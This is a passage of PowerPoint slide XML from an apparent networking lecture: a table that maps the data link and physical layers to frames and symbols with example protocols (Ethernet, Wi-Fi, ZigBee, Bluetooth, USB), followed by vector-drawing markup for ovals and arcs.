                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId21" tooltip="Frame (networking)"/>
                        </a:rPr>
                        <a:t>Frame</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId22" tooltip="802.3"/>
                        </a:rPr>
                        <a:t>802.3</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23" tooltip="Ethernet"/>
                        </a:rPr>
                        <a:t>Ethernet</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24" tooltip="802.11"/>
                        </a:rPr>
                        <a:t>802.11</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25" tooltip="Wi-Fi"/>
                        </a:rPr>
                        <a:t>Wi-Fi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>,and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId26" tooltip="802.15.4"/>
                        </a:rPr>
                        <a:t>802.15.4</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27" tooltip="ZigBee"/>
                        </a:rPr>
                        <a:t>ZigBee</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> )</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Reliable transmission of data frames between two nodes connected by a physical layer</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3169604544"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="506055">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId28" tooltip="Physical layer"/>
                        </a:rPr>
                        <a:t>Physical</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:hlinkClick r:id="rId29" tooltip="Symbol rate"/>
                        </a:rPr>
                        <a:t>Symbol</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0B0080"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId30" tooltip="Bluetooth"/>
                        </a:rPr>
                        <a:t>Bluetooth</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31" tooltip="Ethernet physical layer"/>
                        </a:rPr>
                        <a:t>Ethernet</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId32" tooltip="USB"/>
                        </a:rPr>
                        <a:t>USB</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> )</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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Transmission and reception of raw bit streams over a physical medium</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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3152286032"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{805A2888-280D-2747-A8BB-403CD0446DCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83142691-4AC0-3441-ABC5-A7050A34FDE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10614454" y="815546"/>
            <a:ext cx="1326291" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Wikipedia</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4029930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1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56242663-BC82-2F45-9BB2-EBAA91312723}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9052799" y="1552874"/>
            <a:ext cx="1178917" cy="804959"/>
            <a:chOff x="1372" y="240"/>
            <a:chExt cx="836" cy="549"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66564" name="Group 1028">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41DDF8D2-17FA-2742-9FCB-04DC33613988}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1372" y="240"/>
              <a:ext cx="833" cy="499"/>
              <a:chOff x="628" y="1878"/>
              <a:chExt cx="833" cy="499"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66565" name="Oval 1029">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C235B867-EC8E-B141-BDD6-425479599865}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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6" name="Oval 1030">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63DACF87-148E-984A-ABF5-0A663EA6D225}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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7" name="Oval 1031">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{583CB7F0-7264-C245-8CA1-EE3A0F4CBDD6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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8" name="Oval 1032">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A1199E0-57E8-D54E-B7E5-9EBD8EC91A1E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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9" name="Oval 1033">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61E5EBB8-3EE2-B449-B973-1BFD7B03889C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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0" name="Oval 1034">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66AE4486-97AB-BB45-8FE7-918CB86E51EF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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1" name="Oval 1035">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24960211-3F1B-FE44-8F85-0932B3D2CA25}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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2" name="Oval 1036">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B4CD416-9D5D-604D-9F84-95F34508443C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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3" name="Oval 1037">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E2974E1-E544-4E4B-8835-D88B6DCA0D9E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>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574" name="Group 1038">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EF74EB8-4D76-9442-85BC-45887BD21115}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1372" y="286"/>
              <a:ext cx="836" cy="503"/>
              <a:chOff x="628" y="1876"/>
              <a:chExt cx="836" cy="503"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66575" name="Arc 1039">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD86B9A9-241A-A046-8BC4-BDA56C4E73F4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="921" y="1876"/>
                <a:ext cx="346" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 20557 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 0 w 40736"/>
                  <a:gd name="T1" fmla="*/ 14968 h 21600"/>
                  <a:gd name="T2" fmla="*/ 40736 w 40736"/>
                  <a:gd name="T3" fmla="*/ 13896 h 21600"/>
                  <a:gd name="T4" fmla="*/ 20557 w 40736"/>
                  <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="40736" h="21600" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="0" y="14968"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2878" y="6046"/>
                      <a:pt x="11182" y="0"/>
                      <a:pt x="20557" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29513" y="0"/>
                      <a:pt x="37541" y="5528"/>
                      <a:pt x="40736" y="13895"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="40736" h="21600" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="0" y="14968"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2878" y="6046"/>
                      <a:pt x="11182" y="0"/>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6" name="Arc 1040">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92921966-93E6-BF49-B513-9D1BFBD86065}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="923" y="1878"/>
                <a:ext cx="342" cy="102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 20540 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 0 w 40698"/>
                  <a:gd name="T1" fmla="*/ 14917 h 21600"/>
                  <a:gd name="T2" fmla="*/ 40698 w 40698"/>
                  <a:gd name="T3" fmla="*/ 13839 h 21600"/>
                  <a:gd name="T4" fmla="*/ 20540 w 40698"/>
                  <a:gd name="T5" fmla="*/ 21600 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="40698" h="21600" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="-1" y="14916"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2894" y="6021"/>
                      <a:pt x="11185" y="0"/>
                      <a:pt x="20540" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29474" y="0"/>
                      <a:pt x="37487" y="5501"/>
                      <a:pt x="40697" y="13839"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="40698" h="21600" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="-1" y="14916"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2894" y="6021"/>
                      <a:pt x="11185" y="0"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66577" name="Arc 1041">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{887E7695-5608-BD4C-AC2B-6E31CCEE9C58}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="713" y="1930"/>
                <a:ext cx="214" cy="126"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 442 w 32990"/>
                  <a:gd name="T1" fmla="*/ 25945 h 25945"/>
                  <a:gd name="T2" fmla="*/ 32990 w 32990"/>
                  <a:gd name="T3" fmla="*/ 3247 h 25945"/>
                  <a:gd name="T4" fmla="*/ 21600 w 32990"/>
                  <a:gd name="T5" fmla="*/ 21600 h 25945"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="32990" h="25945" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="441" y="25945"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="24515"/>
                      <a:pt x="0" y="23059"/>
                      <a:pt x="0" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="9670"/>
                      <a:pt x="9670" y="0"/>
                      <a:pt x="21600" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25625" y="0"/>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0"/>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8" name="Arc 1042">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B1A514-DAD5-2448-A91B-B34A13D0B2AD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="715" y="1932"/>
                <a:ext cx="211" cy="123"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 21600 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 446 w 32950"/>
                  <a:gd name="T1" fmla="*/ 25966 h 25966"/>
                  <a:gd name="T2" fmla="*/ 32950 w 32950"/>
                  <a:gd name="T3" fmla="*/ 3222 h 25966"/>
                  <a:gd name="T4" fmla="*/ 21600 w 32950"/>
                  <a:gd name="T5" fmla="*/ 21600 h 25966"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="32950" h="25966" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="445" y="25966"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="149" y="24529"/>
                      <a:pt x="0" y="23066"/>
                      <a:pt x="0" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="9670"/>
                      <a:pt x="9670" y="0"/>
                      <a:pt x="21600" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25608" y="0"/>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0"/>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sz="1797" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66579" name="Arc 1043">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4473938D-BFA8-2241-990F-2504398E7C1E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="682" y="2217"/>
                <a:ext cx="216" cy="99"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 917 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 32074 w 32074"/>
                  <a:gd name="T1" fmla="*/ 19808 h 22517"/>
                  <a:gd name="T2" fmla="*/ 19 w 32074"/>
                  <a:gd name="T3" fmla="*/ 0 h 22517"/>
                  <a:gd name="T4" fmla="*/ 21600 w 32074"/>
                  <a:gd name="T5" fmla="*/ 917 h 22517"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="32074" h="22517" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="32073" y="19807"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28868" y="21584"/>
                      <a:pt x="25264" y="22517"/>
                      <a:pt x="21600" y="22517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9670" y="22517"/>
                      <a:pt x="0" y="12846"/>
                      <a:pt x="0" y="917"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="611"/>
                      <a:pt x="6" y="305"/>
                      <a:pt x="19" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="32074" h="22517" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="32073" y="19807"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28868" y="21584"/>
                      <a:pt x="25264" y="22517"/>
                      <a:pt x="21600" y="22517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9670" y="22517"/>
                      <a:pt x="0" y="12846"/>
                      <a:pt x="0" y="917"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="611"/>
                      <a:pt x="6" y="305"/>
                      <a:pt x="19" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21600" y="9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0" name="Arc 1044">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E51F813B-B2D0-C147-91F9-8BC75C38C387}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="684" y="2217"/>
                <a:ext cx="213" cy="96"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="G0" fmla="+- 21600 0 0"/>
                  <a:gd name="G1" fmla="+- 924 0 0"/>
                  <a:gd name="G2" fmla="+- 21600 0 0"/>
                  <a:gd name="T0" fmla="*/ 32013 w 32013"/>
                  <a:gd name="T1" fmla="*/ 19848 h 22524"/>
                  <a:gd name="T2" fmla="*/ 20 w 32013"/>
                  <a:gd name="T3" fmla="*/ 0 h 22524"/>
                  <a:gd name="T4" fmla="*/ 21600 w 32013"/>
                  <a:gd name="T5" fmla="*/ 924 h 22524"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="32013" h="22524" fill="none" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="32013" y="19848"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28823" y="21603"/>
                      <a:pt x="25241" y="22524"/>
                      <a:pt x="21600" y="22524"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9670" y="22524"/>
                      <a:pt x="0" y="12853"/>
                      <a:pt x="0" y="924"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="615"/>
                      <a:pt x="6" y="307"/>
                      <a:pt x="19" y="-1"/>
                    </a:cubicBezTo>
                  </a:path>
                  <a:path w="32013" h="22524" stroke="0" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="32013" y="19848"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28823" y="21603"/>
                      <a:pt x="25241" y="22524"/>
                      <a:pt x="21600" y="22524"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9670" y="22524"/>
                      <a:pt x="0" y="12853"/>
                      <a:pt x="0" y="924"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="615"/>
